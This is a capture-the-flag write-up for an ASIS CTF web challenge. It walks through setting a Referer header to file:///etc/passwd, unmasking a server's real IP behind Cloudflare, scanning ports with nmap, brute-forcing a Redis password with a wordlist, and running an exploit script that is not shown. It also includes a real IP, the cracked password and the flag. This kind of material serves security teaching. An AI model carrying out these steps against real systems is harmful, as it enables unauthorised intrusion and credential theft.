Solves: 1
This write-up was made per request of other players who were playing ASIS CTF.
Note: I solved this challenge before the hint was released. \o/
We got a suspicious web service which does nothing at all. If you have time to test it, please help me to leak out all data from it. Thanks!
Hint: The server keeps your access log on submission.
By searching around for a bit, contact.php had a very suspicious content.
<h5>By clicking send button, you hereby agree that all your access information are allowed to be reviewed.<h4>
<!-- Note: It's all for analytics.. Don't worry, we won't harm you. -->
By analyzing the contact.php, there was a weird URL check in Referer header.
POST /contact.php HTTP/1.1
Host: ca12379f1163ff045b3ac80842d15bdb.gdn
Connection: keep-alive
Content-Length: 109
Pragma: no-cache
Cache-Control: no-cache
Origin: null
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4,zh-CN;q=0.2,zh;q=0.2
Referer: file:///etc/passwd
Cookie: __cfduid=d22559f51eaf8ee0cd770a1564dc3f8f81473527951
fname=name&address=http%3A%2F%2Flocalhost&email=root%40localhost&phone=phone+number&message=message&send=send
HTTP/1.1 200 OK
Date: Sun, 11 Sep 2016 15:22:57 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: cloudflare-nginx
CF-RAY: 2e0c1e2bbfde3a54-ICN
3aa
(... skipped some tags ..)
<div id="body">Invalid
6
param.
0
Then I changed the Referer to https://ctf.stypr.com/test.php and got an real IP address of the domain.
For further pentesting, I assumed that discovering real IP would be the best (cloudflare is a cdn service for websites, so it won't point out server's IP addresses.) way to work out, to inspect deeper parts of service.
66.172.33.176 (-) [11/Sep/2016:12:31:48 +0900] "GET /test.php HTTP/1.1" 200 505 "-" 0.005
From here, I used nmap to see if there are any vulnerable ports open.
$ nmap -sT 66.172.33.176 -p1024-10240
Starting Nmap 7.01 ( https://nmap.org ) at 2016-09-11 12:41 JST
Stats: 0:00:29 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 46.79% done; ETC: 00:27 (0:00:33 remaining)
Stats: 0:00:41 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 70.48% done; ETC: 00:27 (0:00:17 remaining)
Nmap scan report for ip-66-172-33-176.chunkhost.com (66.172.33.176)
Host is up (0.11s latency).
Not shown: 10157 closed ports
PORT STATE SERVICE
3702/tcp filtered unknown
6226/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 54.48 seconds
Then I connected to the 6226 port to check for available commands, and then realized that it was redis running behind.
$ nc 66.172.33.176 6226
HELP
-ERR unknown command 'HELP'
INFO
-NOAUTH Authentication required.
AUTH stypr
-ERR invalid password
There are a lot of redis brute force attacking tools available online, however, I made my own brute forcer since it's easy to make and tools like enteletaor didn't work out well.
I used the top 10000 password wordlist and got the correct authentication with the password crunch.
Then I looked and googled for any possible redis vulnerability and found this good resource.
Now the only left part to find is to look for the correct username.
Since that the website was made by acid (as seen in footer of the website), I assumed the username is acid and wrote an exploit for the challenge.
Please check exploit.py to view the sourcecode.
$ python exploit.py
Password: crunch
OK
OK
OK
OK
OK
ASIS{55ab63e61cac968dd1da217dab2d86b8}
Connection to 66.172.33.176 closed.
ASIS{55ab63e61cac968dd1da217dab2d86b8}